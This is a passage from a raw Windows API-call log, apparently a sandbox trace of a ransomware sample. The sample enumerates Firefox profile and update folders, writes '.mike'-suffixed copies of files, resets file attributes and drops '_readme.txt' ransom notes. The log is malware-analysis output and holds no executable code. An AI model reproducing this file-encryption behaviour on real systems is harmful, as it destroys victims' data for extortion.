SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0145.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0145.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0145.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0145.419] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png", dwFileAttributes=0x80) returned 1 [0145.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0145.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0145.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef00) returned 1 [0145.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeefc) returned 1 [0145.422] WriteFile (in: hFile=0x280, lpBuffer=0x21155ec*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aef98, lpOverlapped=0x0 | out: lpBuffer=0x21155ec*, lpNumberOfBytesWritten=0x2aef98*=0x45e, lpOverlapped=0x0) returned 1 [0145.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0145.424] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\*", lpFindFileData=0x2aedac | out: lpFindFileData=0x2aedac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb653ec30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x1ff306e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ff56840, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.424] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb653ec30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x1ff306e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ff56840, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.425] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ff0a580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ff0a580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ff0a580, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x42d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4cc87c1409819bf06f42b782d4902b2f.png.mike", cAlternateFileName="4CC87C~1.MIK")) returned 1 [0145.425] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ff0a580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ff0a580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ff306e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x42d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ba182bcd131f1f3c6b6fbbb1ba078341.png.mike", cAlternateFileName="BA182B~1.MIK")) returned 1 [0145.425] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ff306e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ff306e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ff56840, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x1c590, dwReserved0=0x0, dwReserved1=0x0, cFileName="ce8c0453589216a67cddb50284fbfe8d.png.mike", cAlternateFileName="CE8C04~1.MIK")) returned 1 [0145.426] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ff0a580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ff0a580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ff56840, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0145.426] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ff0a580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ff0a580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ff56840, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0145.427] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0145.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0145.427] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0145.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0145.428] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.428] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.429] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x854b47b0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x854b47b0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E7CF176E110C211B", cAlternateFileName="E7CF17~1")) returned 1 [0145.429] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x854b47b0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x854b47b0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E7CF176E110C211B", cAlternateFileName="E7CF17~1")) returned 0 [0145.429] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0145.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0145.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0145.431] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x854b47b0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x854b47b0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E7CF176E110C211B", cAlternateFileName="E7CF17~1")) returned 1 [0145.432] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0145.433] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0145.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0145.433] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0145.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0145.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x854b47b0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x854b47b0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x854b47b0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x854b47b0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80a2b6d0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x464, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-update.xml", cAlternateFileName="ACTIVE~1.XML")) returned 1 [0145.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb74b7b30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb74b7b30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="updates", cAlternateFileName="")) returned 1 [0145.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80a9daf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8548e650, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8548e650, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x39, dwReserved0=0x0, dwReserved1=0x0, cFileName="updates.xml", cAlternateFileName="")) returned 1 [0145.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0145.438] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0145.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0145.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0145.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0145.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0145.441] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0145.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0145.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0145.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0145.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0145.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.mike", lpFilePart=0x0) returned 0x63 [0145.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0145.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0145.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0145.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0145.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0145.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0145.445] WriteFile (in: hFile=0x280, lpBuffer=0x211e808*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x211e808*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0145.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0145.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0145.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0145.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0145.448] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefe4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aefe4*=0) returned 0x0 [0145.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.mike", lpFilePart=0x0) returned 0x63 [0145.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0145.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0145.451] WriteFile (in: hFile=0x280, lpBuffer=0x21242d4*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x21242d4*, lpNumberOfBytesWritten=0x2aefe4*=0x470, lpOverlapped=0x0) returned 1 [0145.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0145.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0145.454] WriteFile (in: hFile=0x280, lpBuffer=0x2127538*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2127538*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0145.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0145.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0145.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0145.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0145.455] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml", dwFileAttributes=0x80) returned 1 [0145.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0145.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0145.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0145.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0145.458] WriteFile (in: hFile=0x280, lpBuffer=0x212ac70*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af028, lpOverlapped=0x0 | out: lpBuffer=0x212ac70*, lpNumberOfBytesWritten=0x2af028*=0x45e, lpOverlapped=0x0) returned 1 [0145.459] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml", nBufferLength=0x105, lpBuffer=0x2aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml", lpFilePart=0x0) returned 0x58 [0145.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0145.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0145.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0145.460] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0145.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0145.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0145.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0145.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0145.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0145.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0145.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0145.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0145.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0145.463] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0145.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0145.463] WriteFile (in: hFile=0x280, lpBuffer=0x212e078*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x212e078*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0145.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0145.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0145.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0145.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0145.466] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefe4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aefe4*=0) returned 0x0 [0145.467] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.mike", lpFilePart=0x0) returned 0x5d [0145.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0145.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0145.468] WriteFile (in: hFile=0x280, lpBuffer=0x213225c*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x213225c*, lpNumberOfBytesWritten=0x2aefe4*=0x40, lpOverlapped=0x0) returned 1 [0145.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0145.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0145.471] WriteFile (in: hFile=0x280, lpBuffer=0x21354a8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x21354a8*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0145.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0145.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0145.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0145.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0145.473] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml", dwFileAttributes=0x80) returned 1 [0145.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0145.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0145.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0145.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0145.476] WriteFile (in: hFile=0x280, lpBuffer=0x2138b38*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af028, lpOverlapped=0x0 | out: lpBuffer=0x2138b38*, lpNumberOfBytesWritten=0x2af028*=0x45e, lpOverlapped=0x0) returned 1 [0145.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0145.477] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x1ffc8c60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ffeedc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x1ffc8c60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ffeedc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ffa2b00, 